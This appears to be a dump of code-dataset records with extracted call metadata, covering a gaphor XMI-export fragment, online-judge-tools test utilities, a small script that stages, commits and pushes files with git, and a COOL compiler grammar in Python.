[((10, 9, 10, 36), 'logging.getLogger', 'logging.getLogger', ({(10, 27, 10, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((31, 12, 31, 47), 'gaphor.core.gettext', 'gettext', ({(31, 20, 31, 46): '"""Export model to XMI file"""'}, {}), "('Export model to XMI file')", False, 'from gaphor.core import action, gettext\n'), ((38, 21, 38, 64), 'gaphor.plugins.xmiexport.exportmodel.XMIExport', 'exportmodel.XMIExport', ({(38, 43, 38, 63): 'self.element_factory'}, {}), '(self.element_factory)', False, 'from gaphor.plugins.xmiexport import exportmodel\n'), ((24, 14, 24, 38), 'gaphor.core.gettext', 'gettext', ({(24, 22, 24, 37): '"""Export to XMI"""'}, {}), "('Export to XMI')", False, 'from gaphor.core import action, gettext\n'), ((25, 16, 25, 77), 'gaphor.core.gettext', 'gettext', ({(25, 24, 25, 76): '"""Export model to XMI (XML Model Interchange) format"""'}, {}), "('Export model to XMI (XML Model Interchange) format')", False, 'from gaphor.core import action, gettext\n')]
btk15049/online-judge-tools
tests/utils.py
22505e98359c50df06e7cc1d53a7d253cb096b14
import contextlib import os import pathlib import subprocess import sys import tempfile @contextlib.contextmanager def chdir(path): cwd = os.getcwd() try: os.chdir(path) yield finally: os.chdir(cwd) def prepare_files(files): for f in files: path = pathlib.Path(f['path']) path.parent.mkdir(parents=True, exist_ok=True) with open(str(path), 'w') as fh: fh.write(f['data']) if f.get('executable', False): path.chmod(0o755) @contextlib.contextmanager def sandbox(files): with tempfile.TemporaryDirectory() as tempdir: with chdir(tempdir): prepare_files(files) yield tempdir def get_oj_exe(): oj_exe = os.environ.get('TEST_OJ_EXE') if oj_exe is not None: return [str(pathlib.Path(oj_exe).resolve())] else: return [sys.executable, '-m', 'onlinejudge._implementation.main'] def run(args, *, env=None, check=False, oj_exe=get_oj_exe()): # oj_exe should be evaluated out of sandboxes env = env or dict(os.environ) env['PYTHONPATH'] = str(pathlib.Path(__file__).parent.parent) # this is required to run in sandboxes return subprocess.run(oj_exe + args, stdout=subprocess.PIPE, stderr=sys.stderr, env=env, check=check) def run_in_sandbox(args, files): with sandbox(files) as tempdir: proc = run(args) return { 'proc': proc, 'tempdir': tempdir, } def cat(): if os.name == 'nt': return '{} -c "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"'.format(sys.executable) else: return 'cat' def sleep_1sec(): if os.name == 'nt': return '{} -c "import time; time.sleep(1)"'.format(sys.executable) else: return 'sleep 1.0' def python_c(cmd): assert '"' not in cmd return '{} -c "{}"'.format(sys.executable, cmd) def python_script(path): assert '"' not in path return '{} "{}"'.format(sys.executable, path) def is_logged_in(service, memo={}): # functools.lru_cache is unusable since Service are unhashable url = service.get_url() if url not in memo: proc = run(['login', '--check', url]) memo[url] = proc.returncode == 0 return memo[url]
[((11, 10, 11, 21), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((38, 13, 38, 42), 'os.environ.get', 'os.environ.get', ({(38, 28, 38, 41): '"""TEST_OJ_EXE"""'}, {}), "('TEST_OJ_EXE')", False, 'import os\n'), ((49, 11, 49, 105), 'subprocess.run', 'subprocess.run', (), '', False, 'import subprocess\n'), ((13, 8, 13, 22), 'os.chdir', 'os.chdir', ({(13, 17, 13, 21): 'path'}, {}), '(path)', False, 'import os\n'), ((16, 8, 16, 21), 'os.chdir', 'os.chdir', ({(16, 17, 16, 20): 'cwd'}, {}), '(cwd)', False, 'import os\n'), ((21, 15, 21, 38), 'pathlib.Path', 'pathlib.Path', ({(21, 28, 21, 37): "f['path']"}, {}), "(f['path'])", False, 'import pathlib\n'), ((31, 9, 31, 38), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ({}, {}), '()', False, 'import tempfile\n'), ((48, 28, 48, 50), 'pathlib.Path', 'pathlib.Path', ({(48, 41, 48, 49): '__file__'}, {}), '(__file__)', False, 'import pathlib\n'), ((40, 20, 40, 40), 'pathlib.Path', 'pathlib.Path', ({(40, 33, 40, 39): 'oj_exe'}, {}), '(oj_exe)', False, 'import pathlib\n')]
zerzerzerz/Computer-Virus
git_operation.py
4a3125b45e0e4210fb1b8c970a0d6c6bde77f2e8
import os commit_string = "选择data的前多少个维度参与训练" not_add = ['results', 'data', 'weights'] for item in os.listdir(): if item in not_add: # print(item) continue else: os.system(f"git add {item}") os.system(f'git commit -m "{commit_string}"') os.system("git push origin main")
[((5, 12, 5, 24), 'os.listdir', 'os.listdir', ({}, {}), '()', False, 'import os\n'), ((11, 0, 11, 45), 'os.system', 'os.system', ({(11, 10, 11, 44): 'f"""git commit -m "{commit_string}\\""""'}, {}), '(f\'git commit -m "{commit_string}"\')', False, 'import os\n'), ((12, 0, 12, 33), 'os.system', 'os.system', ({(12, 10, 12, 32): '"""git push origin main"""'}, {}), "('git push origin main')", False, 'import os\n'), ((10, 8, 10, 36), 'os.system', 'os.system', ({(10, 18, 10, 35): 'f"""git add {item}"""'}, {}), "(f'git add {item}')", False, 'import os\n')]
peanut-butter-jellyyy/cool-compiler-2021
src/cool_grammar.py
63a668d435ed22cfb8dbb096bc3c82a34f09517b
from src.cmp.pycompiler import Grammar from src.ast_nodes import ( ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode, ) def define_cool_grammar(print_grammar=False): # grammar G = Grammar() # non-terminals program = G.NonTerminal("<program>", startSymbol=True) class_list, def_class = G.NonTerminals("<class-list> <def-class>") feature_list, def_attr, def_func = G.NonTerminals( "<feature-list> <def-attr> <def-func>" ) param_list, param = G.NonTerminals("<param-list> <param>") expr, comp, arith, term, factor, element, atom = G.NonTerminals( "<expr> <comp> <arith> <term> <factor> <element> <atom>" ) identifiers_list, identifier_init = G.NonTerminals("<ident-list> <ident-init>") block, case_block, case_item = G.NonTerminals("<block> <case-block> <case-item>") func_call, arg_list = G.NonTerminals("<func-call> <arg-list>") # terminals classx, inherits, notx, isvoid = G.Terminals("class inherits not isvoid") let, inx = G.Terminals("let in") ifx, then, elsex, fi = G.Terminals("if then else fi") whilex, loop, pool = G.Terminals("while loop pool") case, of, esac = G.Terminals("case of esac") semi, colon, comma, dot, opar, cpar, ocur, ccur, at, larrow, rarrow = G.Terminals( "; : , . ( ) { } @ <- =>" ) equal, plus, minus, star, div, less, equal, lesseq, neg = G.Terminals( "= + - * / < = <= ~" ) idx, num, new, string, true, false = G.Terminals("id int new string true false") # productions program %= class_list, lambda h, s: ProgramNode(s[1]) class_list %= def_class + class_list, lambda h, s: [s[1]] + s[2] class_list %= def_class, lambda h, s: [s[1]] def_class %= ( classx + idx + ocur + feature_list + ccur + semi, lambda h, s: ClassDeclarationNode(s[2], s[4]), ) def_class %= ( classx + idx + inherits + idx + ocur + feature_list + ccur + semi, lambda h, s: ClassDeclarationNode(s[2], s[6], s[4]), ) feature_list %= def_attr + semi + feature_list, lambda h, s: [s[1]] + s[3] feature_list %= def_func + semi + feature_list, lambda h, s: [s[1]] + s[3] feature_list %= G.Epsilon, lambda h, s: [] def_attr %= ( idx + colon + idx + larrow + expr, lambda h, s: AttrDeclarationNode(s[1], s[3], s[5]), ) def_attr %= idx + colon + idx, lambda h, s: AttrDeclarationNode(s[1], s[3]) def_func %= ( idx + opar + param_list + cpar + colon + idx + ocur + expr + ccur, lambda h, s: FuncDeclarationNode(s[1], s[3], s[6], s[8]), ) param_list %= param + comma + param_list, lambda h, s: [s[1]] + s[3] param_list %= param, lambda h, s: [s[1]] param_list %= G.Epsilon, lambda h, s: [] param %= idx + colon + idx, lambda h, s: (s[1], s[3]) expr %= idx + larrow + expr, lambda h, s: AssignNode(s[1], s[3]) expr %= let + identifiers_list + inx + expr, lambda h, s: LetNode(s[2], s[4]) expr %= ( ifx + expr + then + expr + elsex + expr + fi, lambda h, s: IfNode(s[2], s[4], s[6]), ) expr %= whilex + expr + loop + expr + pool, lambda h, s: WhileNode(s[2], s[4]) expr %= case + expr + of + case_block + esac, lambda h, s: CaseNode(s[2], s[4]) expr %= notx + expr, lambda h, s: NotNode(s[2]) expr %= comp, lambda h, s: s[1] identifiers_list %= ( identifier_init + comma + identifiers_list, lambda h, s: [s[1]] + s[3], ) identifiers_list %= identifier_init, lambda h, s: [s[1]] identifier_init %= ( idx + colon + idx + larrow + expr, lambda h, s: VarDeclarationNode(s[1], s[3], s[5]), ) identifier_init %= idx + colon + idx, lambda h, s: VarDeclarationNode(s[1], s[3]) case_block %= case_item + case_block, lambda h, s: [s[1]] + s[2] case_block %= case_item, lambda h, s: [s[1]] case_item %= ( idx + colon + idx + rarrow + expr + semi, lambda h, s: CaseItemNode(s[1], s[3], s[5]), ) comp %= comp + less + arith, lambda h, s: LessNode(s[1], s[3]) comp %= comp + equal + arith, lambda h, s: EqualNode(s[1], s[3]) comp %= comp + lesseq + arith, lambda h, s: LessEqualNode(s[1], s[3]) comp %= arith, lambda h, s: s[1] arith %= arith + plus + term, lambda h, s: PlusNode(s[1], s[3]) arith %= arith + minus + term, lambda h, s: MinusNode(s[1], s[3]) arith %= term, lambda h, s: s[1] term %= term + star + factor, lambda h, s: StarNode(s[1], s[3]) term %= term + div + factor, lambda h, s: DivNode(s[1], s[3]) term %= factor, lambda h, s: s[1] factor %= isvoid + element, lambda h, s: IsvoidNode(s[2]) factor %= neg + element, lambda h, s: NegNode(s[2]) factor %= new + idx, lambda h, s: InstantiateNode(s[2]) factor %= element, lambda h, s: s[1] element %= opar + expr + cpar, lambda h, s: s[2] element %= ocur + block + ccur, lambda h, s: BlockNode(s[2]) element %= (element + dot + func_call, lambda h, s: CallNode(*s[3], obj=s[1])) element %= ( element + at + idx + dot + func_call, lambda h, s: CallNode(*s[5], obj=s[1], at_type=s[3]), ) element %= func_call, lambda h, s: CallNode(*s[1]) element %= atom, lambda h, s: s[1] atom %= num, lambda h, s: ConstantNumNode(s[1]) atom %= idx, lambda h, s: VariableNode(s[1]) atom %= ( true, lambda h, s: BooleanNode(s[1]), ) atom %= false, lambda h, s: BooleanNode(s[1]) atom %= string, lambda h, s: StringNode(s[1]) block %= expr + semi, lambda h, s: [s[1]] block %= expr + semi + block, lambda h, s: [s[1]] + s[3] func_call %= idx + opar + arg_list + cpar, lambda h, s: (s[1], s[3]) arg_list %= expr + comma + arg_list, lambda h, s: [s[1]] + s[3] arg_list %= expr, lambda h, s: [s[1]] arg_list %= G.Epsilon, lambda h, s: [] if print_grammar: print(G) return (G, idx, string, num)
[((36, 8, 36, 17), 'src.cmp.pycompiler.Grammar', 'Grammar', ({}, {}), '()', False, 'from src.cmp.pycompiler import Grammar\n'), ((67, 40, 67, 57), 'src.ast_nodes.ProgramNode', 'ProgramNode', ({(67, 52, 67, 56): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((74, 21, 74, 53), 'src.ast_nodes.ClassDeclarationNode', 'ClassDeclarationNode', ({(74, 42, 74, 46): 's[2]', (74, 48, 74, 52): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((78, 21, 78, 59), 'src.ast_nodes.ClassDeclarationNode', 'ClassDeclarationNode', ({(78, 42, 78, 46): 's[2]', (78, 48, 78, 52): 's[6]', (78, 54, 78, 58): 's[4]'}, {}), '(s[2], s[6], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((87, 21, 87, 58), 'src.ast_nodes.AttrDeclarationNode', 'AttrDeclarationNode', ({(87, 41, 87, 45): 's[1]', (87, 47, 87, 51): 's[3]', (87, 53, 87, 57): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((89, 48, 89, 79), 'src.ast_nodes.AttrDeclarationNode', 'AttrDeclarationNode', ({(89, 68, 89, 72): 's[1]', (89, 74, 89, 78): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((93, 21, 93, 64), 'src.ast_nodes.FuncDeclarationNode', 'FuncDeclarationNode', ({(93, 41, 93, 45): 's[1]', (93, 47, 93, 51): 's[3]', (93, 53, 93, 57): 's[6]', (93, 59, 93, 63): 's[8]'}, {}), '(s[1], s[3], s[6], s[8])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((102, 46, 102, 68), 'src.ast_nodes.AssignNode', 'AssignNode', ({(102, 57, 102, 61): 's[1]', (102, 63, 102, 67): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((103, 62, 103, 81), 'src.ast_nodes.LetNode', 'LetNode', ({(103, 70, 103, 74): 's[2]', (103, 76, 103, 80): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((106, 21, 106, 45), 'src.ast_nodes.IfNode', 'IfNode', ({(106, 28, 106, 32): 's[2]', (106, 34, 106, 38): 's[4]', (106, 40, 106, 44): 's[6]'}, {}), '(s[2], s[4], s[6])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((108, 61, 108, 82), 'src.ast_nodes.WhileNode', 'WhileNode', ({(108, 71, 108, 75): 's[2]', (108, 77, 108, 81): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((109, 63, 109, 83), 'src.ast_nodes.CaseNode', 'CaseNode', ({(109, 72, 109, 76): 's[2]', (109, 78, 109, 82): 's[4]'}, {}), '(s[2], s[4])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((110, 38, 110, 51), 'src.ast_nodes.NotNode', 'NotNode', ({(110, 46, 110, 50): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((121, 21, 121, 57), 'src.ast_nodes.VarDeclarationNode', 'VarDeclarationNode', ({(121, 40, 121, 44): 's[1]', (121, 46, 121, 50): 's[3]', (121, 52, 121, 56): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((123, 55, 123, 85), 'src.ast_nodes.VarDeclarationNode', 'VarDeclarationNode', ({(123, 74, 123, 78): 's[1]', (123, 80, 123, 84): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((129, 21, 129, 51), 'src.ast_nodes.CaseItemNode', 'CaseItemNode', ({(129, 34, 129, 38): 's[1]', (129, 40, 129, 44): 's[3]', (129, 46, 129, 50): 's[5]'}, {}), '(s[1], s[3], s[5])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((132, 46, 132, 66), 'src.ast_nodes.LessNode', 'LessNode', ({(132, 55, 132, 59): 's[1]', (132, 61, 132, 65): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((133, 47, 133, 68), 'src.ast_nodes.EqualNode', 'EqualNode', ({(133, 57, 133, 61): 's[1]', (133, 63, 133, 67): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((134, 48, 134, 73), 'src.ast_nodes.LessEqualNode', 'LessEqualNode', ({(134, 62, 134, 66): 's[1]', (134, 68, 134, 72): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((137, 47, 137, 67), 'src.ast_nodes.PlusNode', 'PlusNode', ({(137, 56, 137, 60): 's[1]', (137, 62, 137, 66): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((138, 48, 138, 69), 'src.ast_nodes.MinusNode', 'MinusNode', ({(138, 58, 138, 62): 's[1]', (138, 64, 138, 68): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((141, 47, 141, 67), 'src.ast_nodes.StarNode', 'StarNode', ({(141, 56, 141, 60): 's[1]', (141, 62, 141, 66): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((142, 46, 142, 65), 'src.ast_nodes.DivNode', 'DivNode', ({(142, 54, 142, 58): 's[1]', (142, 60, 142, 64): 's[3]'}, {}), '(s[1], s[3])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((145, 45, 145, 61), 'src.ast_nodes.IsvoidNode', 'IsvoidNode', ({(145, 56, 145, 60): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((146, 42, 146, 55), 'src.ast_nodes.NegNode', 'NegNode', ({(146, 50, 146, 54): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((147, 38, 147, 59), 'src.ast_nodes.InstantiateNode', 'InstantiateNode', ({(147, 54, 147, 58): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((151, 49, 151, 64), 'src.ast_nodes.BlockNode', 'BlockNode', ({(151, 59, 151, 63): 's[2]'}, {}), '(s[2])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((152, 56, 152, 81), 'src.ast_nodes.CallNode', 'CallNode', (), '', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((155, 21, 155, 60), 'src.ast_nodes.CallNode', 'CallNode', (), '', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((157, 39, 157, 54), 'src.ast_nodes.CallNode', 'CallNode', ({(157, 48, 157, 53): '*s[1]'}, {}), '(*s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((160, 30, 160, 51), 'src.ast_nodes.ConstantNumNode', 'ConstantNumNode', ({(160, 46, 160, 50): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((161, 30, 161, 48), 'src.ast_nodes.VariableNode', 'VariableNode', ({(161, 43, 161, 47): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((164, 21, 164, 38), 'src.ast_nodes.BooleanNode', 'BooleanNode', ({(164, 33, 164, 37): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((166, 32, 166, 49), 'src.ast_nodes.BooleanNode', 